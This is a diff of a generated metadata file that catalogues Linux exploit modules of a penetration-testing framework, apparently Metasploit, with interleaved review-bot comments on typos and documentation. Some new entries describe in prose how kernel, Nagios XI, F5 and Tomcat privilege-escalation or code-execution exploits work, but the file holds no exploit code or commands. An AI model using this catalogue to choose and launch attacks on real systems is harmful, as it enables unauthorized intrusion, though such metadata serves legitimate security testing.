"path": "/modules/exploits/linux/http/control_web_panel_login_cmd_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/control_web_panel_login_cmd_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"ioc-in-logs",
"artifacts-on-disk"
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_linux/http/cpi_tararchive_upload": {
"name": "Cisco Prime Infrastructure Health Monitor TarArchive Directory Traversal Vulnerability",
"fullname": "exploit/linux/http/cpi_tararchive_upload",
@@ -63263,10 +64066,11 @@
"cbmixx",
"Green-m <greenm.xxoo@gmail.com>"
],
"description": "This module uses built-in functionality to execute arbitrary commands on an unsecured Hadoop server which is not configured for strong\n authentication, via Hadoop's standard ResourceManager REST API.",
"description": "This module uses Hadoop's standard ResourceManager REST API to execute arbitrary commands on an unsecured Hadoop server.\n Hadoop administrators should enable Kerberos authentication for these endpoints by changing the 'hadoop.security.authentication' setting in 'core-site.xml' from 'simple' (the default) to 'kerberos' before exposing the node to the network.",
"references": [
"URL-http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf",
"URL-https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn"
"URL-https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn",
"URL-https://hadoop.apache.org/docs/current/hadoop-project-dist/hadoop-common/SecureMode.html"
],
"platform": "Linux",
"arch": "x86, x64",
@@ -63289,7 +64093,7 @@
"targets": [
"Automatic"
],
"mod_time": "2020-11-16 11:31:59 +0000",
"mod_time": "2023-02-15 12:37:06 +0000",
"path": "/modules/exploits/linux/http/hadoop_unauth_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/hadoop_unauth_exec",
@@ -63559,7 +64363,7 @@
"targets": [
"IBM Data Risk Manager <= 2.0.4"
],
"mod_time": "2021-09-08 21:56:02 +0000",
"mod_time": "2023-02-08 15:46:07 +0000",
"path": "/modules/exploits/linux/http/ibm_drm_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/ibm_drm_rce",
@@ -63567,6 +64371,16 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs"
]
},
"session_types": false,
"needs_cleanup": null
@@ -64860,7 +65674,7 @@
"Cody Winkler",
"numan türle"
],
"description": "This module exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution.\n The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.",
"description": "This module exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution.\n The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.",
"references": [
"EDB-48483",
"CVE-2020-7209",
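Review bot: the two description lines in this hunk read identically, so the change to linuxki_rce.rb appears to be whitespace-only; while the description is being touched, "resulting in security vulnerability" should read "resulting in a security vulnerability" (the fix goes in the module, as this file is generated).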
@@ -64891,7 +65705,7 @@
"Automatic (Unix In-Memory)",
"Automatic (Linux Dropper)"
],
"mod_time": "2021-08-27 17:15:33 +0000",
"mod_time": "2023-02-08 15:46:07 +0000",
"path": "/modules/exploits/linux/http/linuxki_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/linuxki_rce",
@@ -64899,6 +65713,16 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs"
]
},
"session_types": false,
"needs_cleanup": true
@@ -65703,6 +66527,70 @@
"session_types": false,
"needs_cleanup": null
},
"exploit_linux/http/nagios_xi_configwizards_authenticated_rce": {
"name": "Nagios XI 5.5.6 to 5.7.5 - ConfigWizards Authenticated Remote Code Exection",
"fullname": "exploit/linux/http/nagios_xi_configwizards_authenticated_rce",
"aliases": [
],
"rank": 600,
"disclosure_date": "2021-02-13",
"type": "exploit",
"author": [
"Matthew Mathur"
],
"description": "This module exploits CVE-2021-25296, CVE-2021-25297, and CVE-2021-25298, which are\n OS command injection vulnerabilities in the windowswmi, switch, and cloud-vm\n configuration wizards that allow an authenticated user to perform remote code\n execution on Nagios XI versions 5.5.6 to 5.7.5 as the apache user.\n\n Valid credentials for a Nagios XI user are required. This module has\n been successfully tested against official NagiosXI OVAs from 5.5.6-5.7.5.",
"references": [
"CVE-2021-25296",
"CVE-2021-25297",
"CVE-2021-25298",
"URL-https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.md"
],
"platform": "Linux,Unix",
"arch": "x86, x64, cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Linux (x86)",
"Linux (x64)",
"CMD"
],
"mod_time": "2023-02-07 14:30:11 +0000",
"path": "/modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/nagios_xi_configwizards_authenticated_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs"
],
"Reliability": [
"repeatable-session"
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_linux/http/nagios_xi_magpie_debug": {
"name": "Nagios XI Magpie_debug.php Root Remote Code Execution",
"fullname": "exploit/linux/http/nagios_xi_magpie_debug",
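Review bot: the module name in this hunk, "Nagios XI 5.5.6 to 5.7.5 - ConfigWizards Authenticated Remote Code Exection", has a typo ("Exection"); it should be "Remote Code Execution", corrected in the 'Name' of nagios_xi_configwizards_authenticated_rce.rb so the regenerated metadata picks it up.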
@@ -66922,7 +67810,7 @@
"Linux (x64)",
"Linux (cmd)"
],
"mod_time": "2021-08-27 17:15:33 +0000",
"mod_time": "2023-02-08 15:46:07 +0000",
"path": "/modules/exploits/linux/http/pandora_fms_events_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/pandora_fms_events_exec",
@@ -66930,6 +67818,16 @@
"post_auth": true,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs"
]
},
"session_types": false,
"needs_cleanup": null
@@ -72102,7 +73000,7 @@
"targets": [
"Auto"
],
"mod_time": "2021-02-17 12:33:59 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/abrt_sosreport_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/abrt_sosreport_priv_esc",
@@ -72155,7 +73053,7 @@
"targets": [
"Auto"
],
"mod_time": "2020-09-18 11:38:43 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/af_packet_chocobo_root_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/af_packet_chocobo_root_priv_esc",
@@ -72215,7 +73113,7 @@
"targets": [
"Auto"
],
"mod_time": "2020-09-18 11:38:43 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/af_packet_packet_set_ring_priv_esc",
@@ -72368,7 +73266,7 @@
"targets": [
"Auto"
],
"mod_time": "2022-10-08 09:50:25 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/asan_suid_executable_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/asan_suid_executable_priv_esc",
@@ -72524,7 +73422,7 @@
"targets": [
"Auto"
],
"mod_time": "2020-09-18 11:38:43 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/blueman_set_dhcp_handler_dbus_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/blueman_set_dhcp_handler_dbus_priv_esc",
@@ -72577,7 +73475,7 @@
"Linux x86",
"Linux x64"
],
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/bpf_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/bpf_priv_esc",
@@ -72643,7 +73541,7 @@
"targets": [
"Auto"
],
"mod_time": "2021-02-17 12:33:59 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/bpf_sign_extension_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/bpf_sign_extension_priv_esc",
@@ -72794,7 +73692,7 @@
"targets": [
"Auto"
],
"mod_time": "2021-08-31 15:36:00 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe.rb",
"is_install_path": true,
"ref_name": "linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe",
@@ -72850,7 +73748,7 @@
"x86_64",
"aarch64"
],
"mod_time": "2021-12-02 10:31:47 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/cve_2021_3493_overlayfs.rb",
"is_install_path": true,
"ref_name": "linux/local/cve_2021_3493_overlayfs",
@@ -72974,7 +73872,7 @@
"x86",
"aarch64"
],
"mod_time": "2022-03-09 11:06:26 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/cve_2021_4034_pwnkit_lpe_pkexec.rb",
"is_install_path": true,
"ref_name": "linux/local/cve_2021_4034_pwnkit_lpe_pkexec",
@@ -73090,7 +73988,7 @@
"targets": [
"Ubuntu Linux 5.13.0-37"
],
"mod_time": "2022-04-21 07:44:40 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/cve_2022_0995_watch_queue.rb",
"is_install_path": true,
"ref_name": "linux/local/cve_2022_0995_watch_queue",
@@ -73114,6 +74012,63 @@
],
"needs_cleanup": true
},
"exploit_linux/local/cve_2022_1043_io_uring_priv_esc": {
"name": "io_uring Same Type Object Reuse Priv Esc",
"fullname": "exploit/linux/local/cve_2022_1043_io_uring_priv_esc",
"aliases": [
],
"rank": 500,
"disclosure_date": "2022-03-22",
"type": "exploit",
"author": [
"h00die",
"Ryota Shiga",
"Mathias Krause"
],
"description": "This module exploits a bug in io_uring leading to an additional put_cred()\n that can be exploited to hijack credentials of other processes.\n\n We spawn SUID programs to get the free'd cred object reallocated by a\n privileged process and abuse them to create a SUID root binary ourselves\n that'll pop a shell.\n\n The dangling cred pointer will, however, lead to a kernel panic as soon as\n the task terminates and its credentials are destroyed. We therefore detach\n from the controlling terminal, block all signals and rest in silence until\n the system shuts down and we get killed hard, just to cry in vain, seeing\n the kernel collapse.\n\n The bug affected kernels from v5.12-rc3 to v5.14-rc7.\n\n More than 1 CPU is required for exploitation.\n\n Successfully tested against Ubuntu 22.04.01 with kernel 5.13.12-051312-generic",
"references": [
"URL-https://grsecurity.net/exploiting_and_defending_against_same_type_object_reuse",
"URL-https://github.com/opensrcsec/same_type_object_reuse_exploits",
"URl-https://github.com/torvalds/linux/commit/a30f895ad3239f45012e860d4f94c1a388b36d14",
"CVE-2022-1043"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto"
],
"mod_time": "2023-02-02 10:19:07 +0000",
"path": "/modules/exploits/linux/local/cve_2022_1043_io_uring_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/cve_2022_1043_io_uring_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"artifacts-on-disk"
]
},
"session_types": [
"shell",
"meterpreter"
],
"needs_cleanup": true
},
"exploit_linux/local/desktop_privilege_escalation": {
"name": "Desktop Linux Password Stealer and Privilege Escalation",
"fullname": "exploit/linux/local/desktop_privilege_escalation",
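Review bot: the third reference in this hunk uses the prefix "URl-https://github.com/torvalds/linux/commit/..." instead of "URL-", so it will not be recognised as a URL-type reference like the two entries above it; fix the reference array in cve_2022_1043_io_uring_priv_esc.rb to use 'URL' and regenerate. The description's last sentence ("Successfully tested against Ubuntu 22.04.01 with kernel 5.13.12-051312-generic") is also missing its closing period.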
@@ -73187,7 +74142,7 @@
"targets": [
"Auto"
],
"mod_time": "2020-09-18 11:38:43 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/diamorphine_rootkit_signal_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/diamorphine_rootkit_signal_priv_esc",
@@ -73236,7 +74191,7 @@
"targets": [
"Automatic"
],
"mod_time": "2020-09-18 11:38:43 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb",
"is_install_path": true,
"ref_name": "linux/local/docker_daemon_privilege_escalation",
@@ -73263,7 +74218,7 @@
"author": [
"stealthcopter"
],
"description": "This module escapes from a privileged Docker container and obtains root on the host machine by abusing the Linux cgroup notification on release\n feature. This exploit should work against any container started with the following flags: `--cap-add=SYS_ADMIN`, `--privileged`.",
"description": "This module escapes from a privileged Docker container and obtains root on the host machine by abusing the Linux cgroup notification on release\n feature. This exploit should work against any container started with the following flags: `--cap-add=SYS_ADMIN`, `--privileged`.",
"references": [
"EDB-47147",
"URL-https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/",
@@ -73281,7 +74236,7 @@
"targets": [
"Automatic"
],
"mod_time": "2021-02-16 13:56:50 +0000",
"mod_time": "2023-02-08 15:46:07 +0000",
"path": "/modules/exploits/linux/local/docker_privileged_container_escape.rb",
"is_install_path": true,
"ref_name": "linux/local/docker_privileged_container_escape",
@@ -73289,6 +74244,16 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs"
]
},
"session_types": [
"shell",
@@ -73391,7 +74356,7 @@
"targets": [
"Exim 4.87 - 4.91"
],
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/exim4_deliver_message_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/exim4_deliver_message_priv_esc",
@@ -73406,6 +74371,60 @@
],
"needs_cleanup": true
},
"exploit_linux/local/f5_create_user": {
"name": "F5 Big-IP Create Admin User",
"fullname": "exploit/linux/local/f5_create_user",
"aliases": [
],
"rank": 300,
"disclosure_date": "2022-11-16",
"type": "exploit",
"author": [
"Ron Bowes"
],
"description": "This creates a local user with a username/password and root-level\n privileges. Note that a root-level account is not required to do this,\n which makes it a privilege escalation issue.\n\n Note that this is pretty noisy, since it creates a user account and\n creates log files and such. Additionally, most (if not all)\n vulnerabilities in F5 grant root access anyways.\n\n Adapted from https://github.com/rbowes-r7/refreshing-mcp-tool/blob/main/mcp-privesc.rb",
"references": [
"URL-https://github.com/rbowes-r7/refreshing-mcp-tool",
"URL-https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/",
"URL-https://support.f5.com/csp/article/K97843387"
],
"platform": "Linux,Python,Unix",
"arch": "cmd, python",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto"
],
"mod_time": "2023-02-01 11:02:04 +0000",
"path": "/modules/exploits/linux/local/f5_create_user.rb",
"is_install_path": true,
"ref_name": "linux/local/f5_create_user",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
"Stability": [
],
"Reliability": [
],
"SideEffects": [
]
},
"session_types": [
"shell",
"meterpreter"
],
"needs_cleanup": null
},
"exploit_linux/local/glibc_ld_audit_dso_load_priv_esc": {
"name": "glibc LD_AUDIT Arbitrary DSO Load Privilege Escalation",
"fullname": "exploit/linux/local/glibc_ld_audit_dso_load_priv_esc",
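Review bot: the notes block in this hunk has empty "Stability", "Reliability" and "SideEffects" arrays even though the description itself says the module "is pretty noisy, since it creates a user account and creates log files and such"; f5_create_user.rb should declare at least the side effects already used elsewhere in this file (e.g. 'config-changes', 'ioc-in-logs', 'artifacts-on-disk') plus Stability and Reliability values, so that operators filtering on notes see the footprint. "check": false is also worth a sentence in the module docs explaining why no check method is provided.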
@@ -73575,7 +74594,7 @@
"targets": [
"Auto"
],
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/glibc_realpath_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/glibc_realpath_priv_esc",
@@ -73675,7 +74694,7 @@
"Linux x86",
"Linux x64"
],
"mod_time": "2022-10-05 19:43:07 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/hp_xglance_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/hp_xglance_priv_esc",
@@ -73823,7 +74842,7 @@
"targets": [
"Auto"
],
"mod_time": "2022-10-05 19:43:07 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/ktsuss_suid_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/ktsuss_suid_priv_esc",
@@ -73874,7 +74893,7 @@
"targets": [
"Auto"
],
"mod_time": "2020-09-18 11:38:43 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/lastore_daemon_dbus_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/lastore_daemon_dbus_priv_esc",
@@ -73924,7 +74943,7 @@
"targets": [
"Auto"
],
"mod_time": "2022-10-05 19:43:07 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/libuser_roothelper_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/libuser_roothelper_priv_esc",
@@ -73992,7 +75011,7 @@
"targets": [
"Auto"
],
"mod_time": "2022-10-08 09:16:57 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/nested_namespace_idmap_limit_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/nested_namespace_idmap_limit_priv_esc",
@@ -74226,7 +75245,7 @@
"targets": [
"Auto"
],
"mod_time": "2020-09-18 11:38:43 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/network_manager_vpnc_username_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/network_manager_vpnc_username_priv_esc",
@@ -74317,7 +75336,7 @@
"targets": [
"Micro Focus (HPE) Data Protector <= 10.40 build 118"
],
"mod_time": "2022-10-05 19:43:07 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/omniresolve_suid_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/omniresolve_suid_priv_esc",
@@ -74589,7 +75608,7 @@
"targets": [
"Auto"
],
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/ptrace_sudo_token_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/ptrace_sudo_token_priv_esc",
@@ -74638,7 +75657,7 @@
"targets": [
"Auto"
],
"mod_time": "2022-11-12 16:19:50 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/ptrace_traceme_pkexec_helper.rb",
"is_install_path": true,
"ref_name": "linux/local/ptrace_traceme_pkexec_helper",
@@ -74743,7 +75762,7 @@
"targets": [
"Auto"
],
"mod_time": "2020-09-18 11:38:43 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc",
@@ -74800,7 +75819,7 @@
"targets": [
"Auto"
],
"mod_time": "2021-02-17 12:33:59 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/rds_rds_page_copy_user_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/rds_rds_page_copy_user_priv_esc",
@@ -74860,7 +75879,7 @@
"targets": [
"Auto"
],
"mod_time": "2020-09-18 11:38:43 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/recvmmsg_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/recvmmsg_priv_esc",
@@ -74905,7 +75924,7 @@
"targets": [
"Auto"
],
"mod_time": "2020-09-18 11:38:43 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/reptile_rootkit_reptile_cmd_priv_esc",
@@ -75009,7 +76028,7 @@
"targets": [
"Auto"
],
"mod_time": "2022-10-08 09:50:25 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/servu_ftp_server_prepareinstallation_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/servu_ftp_server_prepareinstallation_priv_esc",
@@ -75067,7 +76086,7 @@
"targets": [
"Linux x86"
],
"mod_time": "2021-02-17 12:33:59 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/sock_sendpage.rb",
"is_install_path": true,
"ref_name": "linux/local/sock_sendpage",
@@ -75147,7 +76166,7 @@
"author": [
"Gavin Youker <youkergav@gmail.com>"
],
"description": "This module attempts to create a new login session by\n invoking the su command of a valid username and password.\n\n If the login is successful, a new session is created via\n the specified payload.\n\n Because su forces passwords to be passed over stdin, this\n module attempts to invoke a psuedo-terminal with python,\n python3, or script.",
"description": "This module attempts to create a new login session by\n invoking the su command of a valid username and password.\n\n If the login is successful, a new session is created via\n the specified payload.\n\n Because su forces passwords to be passed over stdin, this\n module attempts to invoke a psuedo-terminal with python,\n python3, or script.",
"references": [
],
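Review bot: the two description lines in this hunk are identical, so the change to su_login.rb appears to be whitespace-only; the existing typo "psuedo-terminal" should be corrected to "pseudo-terminal" in the module's Description while it is being edited.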
@@ -75164,7 +76183,7 @@
"Linux x86",
"Linux x86_64"
],
"mod_time": "2021-02-17 12:33:59 +0000",
"mod_time": "2023-02-08 15:46:07 +0000",
"path": "/modules/exploits/linux/local/su_login.rb",
"is_install_path": true,
"ref_name": "linux/local/su_login",
@@ -75172,6 +76191,16 @@
"post_auth": true,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs"
]
},
"session_types": [
"shell",
@@ -75235,7 +76264,7 @@
"Fedora 23 x64 (sudo v1.8.14p3, libc v2.22)",
"Manual"
],
"mod_time": "2021-08-27 17:15:33 +0000",
"mod_time": "2023-02-08 15:20:32 +0000",
"path": "/modules/exploits/linux/local/sudo_baron_samedit.rb",
"is_install_path": true,
"ref_name": "linux/local/sudo_baron_samedit",
@@ -75300,7 +76329,7 @@
"targets": [
"Auto"
],
"mod_time": "2022-10-08 09:50:25 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/systemtap_modprobe_options_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/systemtap_modprobe_options_priv_esc",
@@ -75324,6 +76353,64 @@
],
"needs_cleanup": true
},
"exploit_linux/local/tomcat_ubuntu_log_init_priv_esc": {
"name": "Apache Tomcat on Ubuntu Log Init Privilege Escalation",
"fullname": "exploit/linux/local/tomcat_ubuntu_log_init_priv_esc",
"aliases": [
],
"rank": 0,
"disclosure_date": "2016-09-30",
"type": "exploit",
"author": [
"h00die",
"Dawid Golunski <dawid@legalhackers.com>"
],
"description": "Tomcat (6, 7, 8) packages provided by default repositories on Debian-based\n distributions (including Debian, Ubuntu etc.) provide a vulnerable\n tomcat init script that allows local attackers who have already gained access\n to the tomcat account (for example, by exploiting an RCE vulnerability\n in a java web application hosted on Tomcat, uploading a webshell etc.) to\n escalate their privileges from tomcat user to root and fully compromise the\n target system.\n\n Tested against Tomcat 8.0.32-1ubuntu1.1 on Ubuntu 16.04",
"references": [
"EDB-40450",
"URL-https://ubuntu.com/security/notices/USN-3081-1",
"URL-http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html",
"CVE-2016-1240"
],
"platform": "Linux",
"arch": "x86, x64, python",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto"
],
"mod_time": "2023-02-05 08:15:38 +0000",
"path": "/modules/exploits/linux/local/tomcat_ubuntu_log_init_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/tomcat_ubuntu_log_init_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"artifacts-on-disk",
"config-changes",
"ioc-in-logs"
]
},
"session_types": [
"shell",
"meterpreter"
],
"needs_cleanup": true
},
"exploit_linux/local/ubuntu_enlightenment_mount_priv_esc": {
"name": "Ubuntu Enlightenment Mount Priv Esc",
"fullname": "exploit/linux/local/ubuntu_enlightenment_mount_priv_esc",
@@ -75355,7 +76442,7 @@
"targets": [
"Auto"
],
"mod_time": "2022-12-01 14:34:09 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/ubuntu_enlightenment_mount_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/ubuntu_enlightenment_mount_priv_esc",
@@ -75515,7 +76602,7 @@
"targets": [
"Auto"
],
"mod_time": "2020-09-18 11:38:43 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/ufo_privilege_escalation.rb",
"is_install_path": true,
"ref_name": "linux/local/ufo_privilege_escalation",
@@ -75567,7 +76654,7 @@
"targets": [
"Auto"
],
"mod_time": "2022-12-01 14:55:43 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/vcenter_java_wrapper_vmon_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/vcenter_java_wrapper_vmon_priv_esc",
@@ -75632,7 +76719,7 @@
"Linux x86",
"Linux x64"
],
"mod_time": "2021-02-17 12:33:59 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/vmware_alsa_config.rb",
"is_install_path": true,
"ref_name": "linux/local/vmware_alsa_config",
@@ -75763,6 +76850,62 @@
],
"needs_cleanup": null
},
"exploit_linux/local/vmwgfx_fd_priv_esc": {
"name": "vmwgfx Driver File Descriptor Handling Priv Esc",
"fullname": "exploit/linux/local/vmwgfx_fd_priv_esc",
"aliases": [
],
"rank": 400,
"disclosure_date": "2022-01-28",
"type": "exploit",
"author": [
"h00die",
"Mathias Krause"
],
"description": "If the vmwgfx driver fails to copy the 'fence_rep' object to userland, it tries to\n recover by deallocating the (already populated) file descriptor. This is\n wrong, as the fd gets released via put_unused_fd() which shouldn't be used,\n as the fd table slot was already populated via the previous call to\n fd_install(). This leaves userland with a valid fd table entry pointing to\n a free'd 'file' object.\n\n We use this bug to overwrite a SUID binary with our payload and gain root.\n Linux kernel 4.14-rc1 - 5.17-rc1 are vulnerable.\n\n Successfully tested against Ubuntu 22.04.01 with kernel 5.13.12-051312-generic.",
"references": [
"URL-https://grsecurity.net/exploiting_and_defending_against_same_type_object_reuse",
"URL-https://github.com/opensrcsec/same_type_object_reuse_exploits",
"CVE-2022-22942"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto"
],
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/linux/local/vmwgfx_fd_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/vmwgfx_fd_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-os-down"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs"
]
},
"session_types": [
"shell",
"meterpreter"
],
"needs_cleanup": true
},
"exploit_linux/local/yum_package_manager_persistence": {
"name": "Yum Package Manager Persistence",
"fullname": "exploit/linux/local/yum_package_manager_persistence",
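Review bot: The new vmwgfx_fd_priv_esc entry declares Stability "crash-os-down" but the description never warns the operator that a failed attempt can take the whole host down; since the same description already lists the tested kernel (5.13.12-051312-generic) and the vulnerable range (4.14-rc1 to 5.17-rc1), add one sentence there about the crash risk so the rank of 400 and the "crash-os-down" note are explained where users actually read. The description also says it overwrites a SUID binary and "needs_cleanup" is true, so the docs should state what cleanup restores.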
@@ -77284,7 +78427,7 @@
"Unix Command",
"Linux Dropper"
],
"mod_time": "2021-11-18 16:33:52 +0000",
"mod_time": "2022-06-23 16:28:10 +0000",
"path": "/modules/exploits/linux/misc/nimbus_gettopologyhistory_cmd_exec.rb",
"is_install_path": true,
"ref_name": "linux/misc/nimbus_gettopologyhistory_cmd_exec",
@@ -77643,7 +78786,7 @@
"targets": [
"TP-Link Archer A7/C7 (AC1750) v5 (firmware up to 201029/30)"
],
"mod_time": "2021-08-27 17:15:33 +0000",
"mod_time": "2023-02-08 15:46:07 +0000",
"path": "/modules/exploits/linux/misc/tplink_archer_a7_c7_lan_rce.rb",
"is_install_path": true,
"ref_name": "linux/misc/tplink_archer_a7_c7_lan_rce",
@@ -77651,6 +78794,16 @@
"post_auth": false,
